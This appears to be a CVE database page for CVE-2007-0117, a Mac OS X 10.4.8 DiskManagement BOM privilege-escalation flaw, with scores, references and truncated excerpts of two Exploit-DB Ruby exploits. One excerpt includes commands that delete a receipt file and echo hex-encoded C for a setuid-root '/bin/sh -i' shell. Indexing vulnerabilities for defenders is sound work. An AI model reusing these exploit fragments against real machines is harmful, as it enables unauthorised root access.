CVE-2007-0117
published 2007-01-09CVE-2007-0117: DiskManagementTool in the DiskManagement.framework 92.29 on Mac OS X 10.4.8 does not properly validate Bill of Materials (BOM) files, which allows attackers to…
PriorityP346critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
5.35%
91.6th percentile
DiskManagementTool in the DiskManagement.framework 92.29 on Mac OS X 10.4.8 does not properly validate Bill of Materials (BOM) files, which allows attackers to gain privileges via a BOM file under /Library/Receipts/, which triggers arbitrary file permission changes upon execution of a diskutil permission repair operation.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | mac_os_x | — | — |
| apple | mac_os_x_server | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Apple Mac OSX 10.4.8 - DiskManagement BOM Privilege Escalation
exploitdb·2007-01-05
CVE-2007-0117 Apple Mac OSX 10.4.8 - DiskManagement BOM Privilege Escalation
Apple Mac OSX 10.4.8 - DiskManagement BOM Privilege Escalation
---
#!/usr/bin/ruby
# (c) 2006 LMH
# Kevin Finisterre
#
# Thanks to The French Connection for bringing this in-the-wild 0-day to
# our attention. If /tmp/ps2 exists on your system, you've been pwned already.
# Thanks to the original authors of the exploit ('meow'). You know who you are.
#
# "They did it for the lulz" - A Fakecure spokesperson on the 'Mother Of all Bombs'.
# "kcoc kcus I ro tcarter uoY" - The Original Drama P3dobear (Kumo' n').
#
require 'fileutils'
# Basic configuration
TARGET_BINARY = "/bin/ps" # Changing this requires you to create a new TEH_EVIL_BOM
TARGET_BACKUP_PATH = "/tmp/ps2" # see: "man lsbom" and "man mkbom"
TARGET_SHELL_PATH = "/usr/bin/id" # Ensure the binary doesn't drop privileges!
BOMARCHIVE_
Exploit-DB
Apple Mac OSX 10.4.8 - DiskManagement BOM 'cron' Local Privilege Escalation
exploitdb·2007-01-05
CVE-2007-0117 Apple Mac OSX 10.4.8 - DiskManagement BOM 'cron' Local Privilege Escalation
Apple Mac OSX 10.4.8 - DiskManagement BOM 'cron' Local Privilege Escalation
---
#!/usr/bin/ruby
# (c) 2006 LMH (code from the other exploit, porting)
# Kevin Finisterre (crontab rock and roll)
#
# Second exploit for MOAB-05-01-2007, uses crontab. much more simple than the other one.
# And works like a charm.
require 'fileutils'
EVIL_COMMANDS = [
"rm /Library/Receipts/Essentials.pkg/Contents/Archive.bom ",
"echo -e \"\\x6d\\x61\\x69\\x6e\\x28\\x29\\x7b\\x20\\x73\\x65\\x74\\x65\\x75\\x69\\x64\\x28\\x30\\x29\\x3b\\x20\\x73\\x65\\x74\\x65\\x67\\x69\\x64\\x28\\x30\\x29\\x3b\\x20\\x73\\x65\\x74\\x75\\x69\\x64\\x28\\x30\\x29\\x3b\\x20\\x73\\x65\\x74\\x67\\x69\\x64\\x28\\x30\\x29\\x3b\\x20\\x73\\x79\\x73\\x74\\x65\\x6d\\x28\\x22\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x20\\x2d\\x69\\x22\\x29\\x3b\
No writeups or analysis indexed.
http://osvdb.org/31167http://projects.info-pull.com/moab/MOAB-05-01-2007.htmlhttp://secunia.com/advisories/23653http://www.securityfocus.com/bid/21899http://www.vupen.com/english/advisories/2007/0074http://osvdb.org/31167http://projects.info-pull.com/moab/MOAB-05-01-2007.htmlhttp://secunia.com/advisories/23653http://www.securityfocus.com/bid/21899http://www.vupen.com/english/advisories/2007/0074
2007-01-09
Published